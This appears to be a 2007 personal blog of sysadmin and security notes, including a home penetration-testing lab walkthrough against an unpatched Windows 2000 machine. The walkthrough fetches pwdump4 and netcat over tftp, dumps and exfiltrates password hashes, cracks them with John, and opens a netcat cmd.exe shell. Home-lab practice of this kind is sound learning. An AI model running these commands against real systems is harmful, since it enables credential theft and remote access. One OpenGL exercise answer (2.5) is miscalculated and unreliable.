Sunday, December 2, 2007

Change VMWare Mac Address

1. edit *.vmx file
2. change ethernet0.addressType = "generated" to ethernet0.addressType = "static"
3. change ethernet0.generatedAddress = "00:0c:29:x:x:x" to ethernet0.Address = "00:0c:29:x:x:x"

VMWare Mac Address are:

000569 Vmware
000C29 VMware
005056 VMWare

000C53 Private
00:0C:53

http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=507
http://virtrix.blogspot.com/2007/04/vmware-configuring-static-mac-address.html

Tuesday, October 23, 2007

Wednesday, October 3, 2007

Application Security Assessment Methodology



http://www.bgdsoftware.com/security/security_assessment.htm
http://www.counterpane.com/application-security-assessment.html

Friday, July 13, 2007

hping, the packet crafter

tcpdump, the packet analyzer

-n

Don’t resolve hostnames

-nn

Don’t resolve hostnames @ port names

-X

Show the packet’s content in both hex & ASCII

-v, -vv, -vvv

Increase the amount of packet information you get back

-c

Only get x number of packets and then stop

-S

Print absolute sequence numbers

-e

Get the Ethernet header as well

tcpdump –nS

Basic communication

tcpdump -nnvvS

Basic communication (very verbose)

tcpdump -nnvvSX

A deeper look at the traffic

tcpdump -nnvvSXs

Heavy packet viewing



http://dmiessler.com/study/tcpdump/

Wednesday, July 11, 2007

TCP Header



http://www.wtcs.org/snmp4tpc/literature.htm

Monday, July 9, 2007

VMWare Images


ISO Images

auditor-150405-04.iso
backtrack-v.1.0-260506.iso
ipcop-install-1.4.10.i386.iso
knoppix-std-0.1.iso
ubuntu-6.10-server-i386.iso

Sunday, July 8, 2007

Installing an SSH Server on Windows

mkpasswd -l [-u ] >> ..\etc\passwd

http://www.netadmintools.com/art516.html

hping vs tcpdump (Packet Crafter vs Packet Analyzer / Sniffer)

prerequisite - you have to know the tcp ip layer, protocol & 3 way handshake

Saturday, July 7, 2007

NETSH - Configure TCP/IP from the command line

Show TCP/IP setting

netsh interface ip show config

Configure static IP

netsh interface ip set address name="Local Area Connection" static 10.21.11.81 255.0.0.0 10.21.11.254 1

Configure DHCP client

netsh interface ip set address "Local Area Connection" dhcp

Configure DNS setting

netsh interface ip set dns "Local Area Connection" static 202.188.0.133

Configure DNS setting 2

netsh interface ip add dns "Local Area Connection" 202.188.1.5 index=2

Configure DNS by DHCP

netsh interface ip set dns "Local Area Connection" dhcp

Configure WINS setting

netsh interface ip set wins "Local Area Connection" static 192.168.0.200

http://www.petri.co.il/configure_tcp_ip_from_cmd.htm

http://thelazyadmin.com/blogs/thelazyadmin/archive/2005/04/04/Using-Netsh-to-Manage-Network-Interfaces-Part-2.aspx

http://cwashington.netreach.net/depo/view.asp?Index=1155&ScriptType=command


Configure IP Address on Backtrack


Command to set

To confirm it


ifconfig eth0 up


Set ip & subnet mask

ifconfig eth0 192.168.1.21 netmask 255.255.255.0

Ifconfig eth0


route add default gw 192.168.1.1 eth0



echo nameserver 192.168.1.1 > /etc/resolv.conf

echo nameserver 212.135.1.36 >> /etc/resolv.conf




http://forums.remote-exploit.org/archive/index.php/t-1489.html

Check disk runs everytime I reboot my PC

the same problem with me...however, after follow the advice, i manage to solve it :)

fsutil dirty query e:
CHKNTFS /X e:
Chkdsk /f /r e:

http://www.experts-exchange.com/Hardware/Desktops/PCs/Q_22623541.html

Wednesday, June 27, 2007

Penetration Tester Lab

First of all, you must have your own machine to hack. In this scenario, i'll setup windows 2000 sp4 and linux redhat 6.2

this old version of linux can be download at

Download Redhat 6.2 here

Installing and Securing IIS Servers

The other machine is Backtrack that already installed into my hard disk for attacking purposes.
By default, windows 2000 sp4 is vulnerable to lsass exploit. So, make sure you patch your machine accordingly. In this lab, i won't patch it to show how the attack can be done.

Windows SP4 - 10.21.11.81
Backtrack (Attacker - 10.21.11.84)

On Backtrack, scan windows 2004 sp4 using nmap

nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81



cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt

exploit the machine...n get the shell.

From the windows 2004, run

tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe


pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt

From Backtrack,

cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt


From Windows,

nc -L -p 2111 -e cmd.exe
telnet 10.21.11.81 2111
whoami


that's it, and GAME OVER

Wednesday, June 13, 2007

Metasploit: 3.0-beta-dev Guide

Basic format for Metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP adress & port number
3. Pick the payload
4. Configure the payload with local IP address & port number
5. Check / Execute the exploit

Step

Command

Description

1

Show exploits

List all exploits

2

Use [exploit name]

Choose

3

Show payloads

To check all available payloads

4

Set PAYLOAD [payload name]

Set the payload

5

Show options

To check more option that can be set

6

Check

To check whether the host is exploitable or not

7

Exploit

Exploit the host

Sunday, June 3, 2007

Network-based Application Vulnerability Assessment

AppDetective(TM) – Application Security, Inc's (AppSecInc) network-based application vulnerability assessment solution that arms you with the tools needed to secure applications/databases against unauthorized external attacks, unauthorized internal access, password cracking, and various other attacks before they occur.

https://www.appsecinc.com/cgi-bin/download.pl?download=AppDetective

Monday, May 28, 2007

Computer Graphics with OpenGL 3rd Edition













2.4 Consider three different raster systems with resolutions of 640 by 480 ,1280 by 1024, and 2560 by 2048. what size frame buffer (in bytes ) is needed for each of these systems to store 12 bits per pixel? How much storage is required for each system if 24 bits per pixel are to be stored?

a) (640*480*12) / 8 = 460 800

b) (1280*1024*12) / 8 = 1 966 080

c) (2560*2048*12) / 8 = 7 864 320

d) (640*480*24) / 8 = 921 600

e) (1280*1024*24) / 8 = 3 932 160

f) (2560*2048*24) / 8 = 15 728 640

2.5 Suppose an RGB raster system is to be designed using an 8 inch by 10 inch screen with a resolution of 100 pixels per inch in each direction. If we want to store 6 bits per pixel in the frame buffer, how much storage(in bytes) do we need for the frame buffer?

(800*10000*6) / 8 byte = 60000000 bytes

2.6 How long would it take to load a 640 by 480 frame buffer with 12 bits per pixel, if 10^5 bits can be transferred per second? How long would it take to load a 24- bit per pixel frame buffer with a resolution of 1280 by 1024 using this same transfer rate?

Storage = 640*480*12 = 307200*12 = 3686400 bits

3686400 bits = 100000x

x = 3686400 bits / 100000

= 36.864 seconds

2.7 Suppose we have a computer with 32 bits per word and a transfer rate of 1 mip (one million instructions per second). How long would it take to fill the frame buffer of a 300 dpi(dot per inch) laser printer with a page size of 8 ½ inches by 11 inches?

2.8 Consider two raster systems with resolution of 640 by 480 and 1280 by 1024.how many pixels could be accessed per second in each of these systems by a display controller that refreshes the screen at a rate of 60 frames per second? What is the access time per pixel in each system?

60*640*480=18432000 pixels. 60*1024*1280=78643200 pixels.

2.9 suppose we have a video monitor with a display area that measures 12 inches across and 9.6 inches high. If the resolution is 1280 by 1024 and the aspect ration is 1, what is the diameter of each screen point?

2.10 How much time is spent scanning across each row of pixels during screen refresh on a raster system with a resolution of 1280 by 1024 and a refresh rate of 60k frames per second?

LinkWithin

Related Posts with Thumbnails